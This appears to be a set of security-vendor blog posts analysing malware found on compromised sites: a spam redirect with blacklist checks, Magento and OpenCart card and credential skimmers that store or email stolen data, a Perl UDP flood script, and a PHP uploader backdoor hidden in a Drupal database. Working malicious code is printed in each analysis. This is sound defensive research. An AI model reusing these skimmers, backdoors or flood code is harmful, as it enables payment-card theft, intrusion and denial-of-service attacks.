SEO spam is very common for a reason -- money. Spammers are paid to promote websites on Google. We deal with lots of SEO spam cases daily. The most common cases are database infections, theme file infections and random spammy html pages. However, few days ago we found an interesting variation: a whole CMS specially configured and used to load spam on a website.

The client asked to help resolve spam issues in Google search results for their website. It was pretty clear that the doorways were still online when we began the analysis so we quickly pinpointed the source of the spam. The hackers created a directory where they installed a version of the MiniCMS application and populated it with spammy content.

MiniCMS is a legitimate minimalist content management system, that does not use database. To store posts and settings, it uses normal files (dat files for posts), which makes it very easy to install virtually on any server that supports PHP. In this case, there were lots of spam dat files.

This case proves that some site owners don’t realize that they provide domain and free hosting to spammers until they get blacklisted or penalized by Google. This is why it is important to monitor your website for all sorts of anomalies. So keep an eye on Google search results for your site, Search Console reports that may mention suspicious URLs or keywords on your site. You might even what to set up Google Alerts for common spammy keywords on your site. Regular internal and external security scans (for example, provided by our Website Monitoring Service) can help detect the problem even faster.

An infected site can be efficient for cyber-criminals unless it gets blacklisted. Traffic significantly drops when a URL is on the Google’s Safe Browsing list. And if the hacked site is used for sending out email spam, then the success of the spam campaign directly correlates to absence of the server in anti-spam blacklists. That’s why it is important for hackers to know whether the sites they compromised are blacklisted or not.

Here’s an example of malware that works with Google’s and Spamhaus’s blacklists.

if ($_GET['mod']){
  if($_GET['mod']=='0XX' OR $_GET['mod']=='00X'){
    $g_sch=file_get_contents('http://www.google.com/safebrowsing/diagnostic?output=jsonp&site=http%3A%2F%2F'.$_SERVER['HTTP_HOST'].'%2F');
      $g_sch = str_replace('"listed"', '', $g_sch, $g_out);
      if($g_out){
        header('HTTP/1.1 202');
        exit;
      }
  }

  if($_GET['mod']=='X0X' OR $_GET['mod']=='00X'){
    $sh = gethostbyname($_SERVER['HTTP_HOST'].'.dbl.spamhaus.org');
    if ($sh=='127.0.1.2' or $sh=='127.0.1.4' or $sh=='127.0.1.5' or 
        $sh=='127.0.1.6' or $sh=='127.0.1.102' or $sh=='127.0.1.103' or 
        $sh=='127.0.1.104' or $sh=='127.0.1.105' or $sh=='127.0.1.106'){
      header('HTTP/1.1 203');
      exit;
    }
  }

  header('HTTP/1.1 201');
  exit;
}

header('HTTP/1.1 302 Found');
header('Location: hxxp://rx-webmart[.]su');

As you can see, by default it’s just a web spam malware that redirects visitors to a site that sells counterfeit drugs. But if you pass certain parameters to this script it will check whether the site is blacklisted by Google and/or by Spamhaus (which suggests that the same campaign also involves email spamming). The result is returned via an HTTP code:

• 201 - not blacklisted
• 202 - blacklisted by Google
• 203 - blacklisted by Spamhaus.org

The use of HTTP codes instead of human readable results makes us think that this functionality is used by a C&C server that regularly polls blacklisting information from all compromised sites.

While this sort monitoring may be useful to hackers, it’s even more useful to normal site owners who risk their business and reputation if their sites get blacklisted. For them, it is important to be able investigate and resolve such incidents as soon as possible. That’s why Sucuri Website Antivirus includes monitoring of 10 blacklists (Google Safe Browsing, SpamHaus DBL, Norton Safe Web, PhishTank, Opera, SiteAdvisor, Bitdefender, Yandex, ESET, plus our own Sucuri blacklist). If websites get blacklisted for any reason, not only do we inform the site owners about it, but also help clean and remove their sites from the blacklists.

We are often seeing malicious code being used to steal credit card details and sensitive information from compromised Magento sites, but this one caught our eyes as it was a bit different from the others on how the information was collected and stored.

Usually, the attacker send all the sensitive information via e-mail but in this case a text file with a "jpg" extension is created to store all the data:

if(preg_match("/".base64_decode('YWRtaW58cGF5bWVudHxvcmRlcnxzYXZlT3JkZXJ8b25lcGFnZXxjaGVja291dA==')."/i", $_SERVER["REQUEST_URI"])){ 
if(!empty($_POST))@file_put_contents(base64_decode('L2Nocm9vdC9ob21lL2RhaWx5Z3JhL2RhaWx5Z3JhYnMuY29tL2h0bWwvbWVkaWEvY2F0YWxvZy9wcm9kdWN0LzIvMS8yMV8xLmpwZw=='), base64_encode( @serialize($_POST)."--".@seralize($_COOKIE) )."\n", FILE_APPEND);
}

Basically, this code writes all the requests that contain one these words in the URL:"admin|payment|order|saveOrder|onepage|checkout" to a file located in "/media/catalog/product/2/1/21_1.jpg".

As you can imagine at this point, the customer's credit card details and admin's login are now available for download.

The data is encoded and serialized inside the file "21_1.jpg" but after revert these steps you'll see something like this:

[payment] => Array

        (
            [method] => vm
            [cc_type] => VI
            [cc_number] => XXXXX -> indistinct cc number
            [c_exp_month] => 9
            [cc_exp_year] => 2017
            [cc_cid] => 048
        )

Among other data, you'll see admin passwords, customer data and credit card details. It's quite scary realize that all these information is being stolen and attackers are continually changing their methods to keep undetected.

This particularly code is usually added inside the files "./app/code/core/Mage/Core/functions.php" or "./lib/Varien/Autoload.php" but other files may be affected. We recommend check constantly the core files for any change and keep all the software updated. Also, for obvious reasons, it's incredibly important change the password for all the admin users to avoid re-infections.

Finally, If you need a professional help, you can always count on us.

After a website is compromised, it can be misused in multiple ways. We often see it being used on Spam SEO campaigns or to distribute drive-by-downloads. However, last week, we found an interesting DDoS (Denial of Service) tool on one of our clients websites that I would like to share.

The code was added to /var/tmp and being called by an external PHP script to allow a remote attacker to start DDoS against specific targets. This is a snippet of the malicious code:

if ($ARGV[1] ==0 && $ARGV[2] ==0) {
goto randpakets;
}
if ($ARGV[1] !=0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &");
goto packets;
}
if ($ARGV[1] !=0 && $ARGV[2] ==0) {
goto packets;
}
if ($ARGV[1] ==0 && $ARGV[2] !=0) {
system("(sleep $time;killall -9 udp) &"); 
goto randpackets;
}
packets:
for (;;) {
$size=$rand x $rand x $rand;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}
randpackets:
for (;;) {
$size=$rand x $rand x $rand;
$port=(rand 65000) +1;
send(crazy, 0, $size, sockaddr_in($port, $iaddr));
}

The malware takes an $ip, $port and $time as an argument to launch the attack:

$ARGC=@ARGV;
my ($ip,$port,$size,$time);
$ip=$ARGV[0];
$port=$ARGV[0];
$time=$ARGV[0];
socket(crazy, PF_INET, SOCK_DGRAM, 17);
$iaddr = inet_aton("$ip");

Once the information is supplied, the script sends as many UDP packets as possible trying to flood the victim’s network. The side effect is that the compromised server could also get overloaded by its resources (cpu/memory) consumption and also overflow bandwidth limits.

If your site is currently experiencing high usage of server resources or unexpected behavior, it could be an indication of a compromise. It’s equally important to be on the lookout for such issues.

You can always count on CloudProxy, our website firewall, to help you protecting your site against this and many other attacks.

It’s very common to see backdoors such as uploaders among site’s files. However, we have seen more often cases where file uploaders, mainly in Drupal websites, are located in the database. Many anti-malware products won’t catch those since they usually look only the files and don’t check the database content. Below is an example of a file uploader found in an entry of an Drupal database:

<?php
echo '<title>Uploader</title>';
echo '<center><font color="#11f0f3"><form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader"></center>';
echo '<center><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form></font><center>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<center><br><br><b><font color="#11f0f3">UPLOAD SUCCESS!</font></b></center><br><br>'; }
else { echo '<center><br><br><b><font color="#f31111">UPLOAD FAILED!</font></b></center><br><br>'; }
}
?>

The code above was embedded in a malicious post created by the attacker, as you can see in the following screenshot:

The code itself is simple as it just accepts a generic file upload and pushes to the root of the site. However, if the database is not properly inspected in your Drupal website, you can be reinfected even after a deep inspection of your files.

If your site is currently infected and you need help cleaning it up, let us know.

While analyzing a compromised Magento site, we found another Credit Card (CC) stealer variation. We posted a few times about this type of malware, but this one is a bit different in a way that it also steals the login credentials for the website users. All the ones we analyzed before never had such behaviour.

The malicious code was found inside the app/code/core/Mage/Admin/Model/Session.php file and emails to XXX@XXX.com every login and password:

class Mage_Admin_Model_Session extends Mage_Core_Model_Session_Abstract
{
    ...skipped code...
    protected function testReview($username, $password, $email)
    {
        $to = 'removed@removed.dom';
        $subject = 'Webserver';
        $message = $username.'|'.$pssword.'|'.$email.'|'.$_SERVER['REQUEST_URI'];
        $headers = 'From: removed@removed.dom' . "\r\n" .
            'Reply-To: removed@removed.dom' . "\r\n" .
            'X-Mailer: PHP/' . phpversion();

        mail($to, $subject, $message, $headers);
    }
    ...skipped code...
    public function login($username, $password, $request = null) {
    ...skipped code...
    if ($user->getId()) {
                $this->testReview($username, $password, $user->getEmail());
                $this->renewSession();
                ...skipped code...
...skipped code...

This is the first time we see a malware on Magento that actually steals credentials alongside with credit card numbers. If you\'re using Magento as e-commerce solution, always check your core files for any modified content, and do regular scans. As always, if you need a professional service for your website, you can count on Sucuri.

We have previously analyzed many Credit Card stealers code, specially targeting the Magento platform:

• Magento Malware Emails Stolen Credit Card Details to Hackers
• Magento script stealing credit card details

However, this type of malicious code is not only being used against Magento, as we see if often on other ecommerce platforms. To give an example, we were analyzing a compromised OpenCart site and found the following entry on the file:

$smail=$order_info['order_id']."|".$order_info['payment_firstname']."|".$order_info['payment_lastname'].
"|".$order_info['payment_address_1']."|".$order_info['payment_city']."|"
.$order_info['payment_postcode']."|".$order_info['payment_zone']."
|".$order_info['payment_country']."|".$order_info['telephone']."|".$this->request->post['cc_expire_date_month'].
"|".$this->request->post['cc_expire_date_year']."|".$this->request->post['cc_cvv2']."|".$this->
request->post['cc_number'];
mail("swordsofnorthshirei@yopmail.com","infectedOpenCart",$smail,"From: infected@anotheropencartsite.dom\r\nReply-to: bademail@yopmail.com");

If you are not familiar with PHP, this code gets all credit card transaction data (including name, address, CVV, etc) and email to swordsofnorthshirei@yopmail.com. Yopmail(.)com is a domain that allows the use of disposable e-mail inboxes.

As you can see, ecommerce sites (and customers) have a lot more to lose when they get compromised as they process and deal with critical information from their users. Whenever possible, we recommend using 3rd party providers, like Stripe or Paypal to reduce your PCI scope and do not allow credit card data to pass through your site.

If you run OpenCart or any other ecommerce platform, check out our Sucuri Firewall to protect your site from attacks and compromises.